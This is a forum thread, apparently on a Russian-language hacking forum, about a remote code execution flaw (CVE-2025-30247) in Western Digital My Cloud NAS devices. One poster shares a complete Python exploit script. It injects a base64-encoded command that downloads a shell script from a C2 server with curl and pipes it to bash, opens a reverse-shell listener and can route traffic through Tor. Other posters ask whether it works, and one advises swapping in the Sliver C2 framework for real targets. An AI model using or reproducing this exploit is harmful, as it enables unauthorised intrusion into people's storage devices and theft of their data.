Western Digital MyCloud Nas CVE-2025-30247

[reg]

Western Digital My Cloud NAS devices vulnerable to unauthenticated RCE (CVE-2025-30247) - Help Net Security

Western Digital has fixed a critical RCE vulnerability (CVE-2025-30247) in its My Cloud NAS devices for home users and small offices.

www.helpnetsecurity.com

направьте куда смотреть в поисках реализации

 

[n3xtr4n]

Here is some of my code you can use :

#!/usr/bin/env python3
import requests
import base64
import argparse
import sys
import socket
import threading
import time
from urllib.parse import quote

# Parse command-line arguments
parser = argparse.ArgumentParser(description="CVE-2025-30247 PoC Exploit for Western Digital My Cloud NAS")
parser.add_argument("target", help="Target URL (e.g., http://192.168.1.100)")
parser.add_argument("--port", default=80, type=int, help="Target port (default: 80)")
parser.add_argument("--endpoint", default="/api/v1/settings", help="Vulnerable endpoint (e.g., /api/v1/settings)")
parser.add_argument("--param", default="param1", help="Vulnerable parameter (e.g., param1)")
parser.add_argument("--c2", default="http://<your_server>:80", help="C2 server URL for payload")
parser.add_argument("--lhost", default="<your_ip>", help="Listener IP for reverse shell")
parser.add_argument("--lport", default=4444, type=int, help="Listener port for reverse shell")
parser.add_argument("--tor", action="store_true", help="Route traffic through Tor")
args = parser.parse_args()

# Payload to download and execute reverse shell
payload = f";curl -s {args.c2}/shell.sh | bash"
encoded_payload = base64.b64encode(payload.encode()).decode()

# Craft POST data
data = {args.param: f";echo {encoded_payload} | base64 -d | bash"}

# Headers to mimic legitimate request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "*/*"
}

# Tor proxy setup
proxies = {"http": "socks5h://127.0.0.1:9050", "https": "socks5h://127.0.0.1:9050"} if args.tor else {}

# Send exploit
def send_exploit():
    url = f"{args.target}:{args.port}{args.endpoint}"
    try:
        print(f"[*] Sending payload to {url}")
        response = requests.post(url, data=data, headers=headers, proxies=proxies, timeout=10, verify=False)
        print(f"[*] Response: {response.status_code}\n{response.text[:200]}")
        if response.status_code == 200:
            print(f"[+] Payload sent successfully. Check listener: nc -lvnp {args.lport}")
        else:
            print(f"[!] Unexpected response code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")
        sys.exit(1)

# Simple listener to confirm shell (optional, for testing)
def start_listener():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((args.lhost, args.lport))
        s.listen(1)
        print(f"[*] Listener started on {args.lhost}:{args.lport}")
        conn, addr = s.accept()
        print(f"[+] Connection from {addr}")
        while True:
            conn.send(b"whoami\n")
            data = conn.recv(1024).decode()
            if not data:
                break
            print(f"[*] Received: {data.strip()}")
        conn.close()
    except Exception as e:
        print(f"[!] Listener error: {e}")

if __name__ == "__main__":
    # Start listener in a separate thread
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
   
    # Wait briefly to ensure listener is up
    time.sleep(1)
   
    # Send exploit
    send_exploit()
   
    # Keep listener running
    listener_thread.join()

 

[reg]

but how search NAS endpoint?

/nas/v1/auth - for login

 

[wav]

Приветствую. Данный сплоит кто то применял ? Робит?

 

[Omezik]

Приветствую. Данный сплоит кто то применял ? Робит?

На тесте падает красиво. Но простой листенер, в реальности меняй пейлоад - юз С2 Sliver напр.